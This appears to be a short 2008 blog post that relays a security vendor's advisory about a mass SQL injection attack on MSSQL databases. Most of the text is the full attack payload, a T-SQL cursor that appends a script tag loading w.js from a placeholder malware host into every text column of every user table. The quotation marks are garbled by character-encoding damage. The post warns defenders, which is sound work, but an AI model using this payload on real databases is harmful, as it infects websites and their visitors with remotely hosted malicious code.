Posts Tagged ‘database’
TrustedSource – Blog – New SQL Injection Attack Infecting Machines
Tuesday, August 12th, 2008
Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:
DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+â€â€></title><script src=â€http://www.domain.com/malware/ w.jsâ€></script><!–†where ‘+@C+’ not like â€%â€></title><script src=â€http://www.domain.com/malware/w.js “></script><!–â€â€™)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
 TrustedSource – Blog – New SQL Injection Attack Infecting Machines
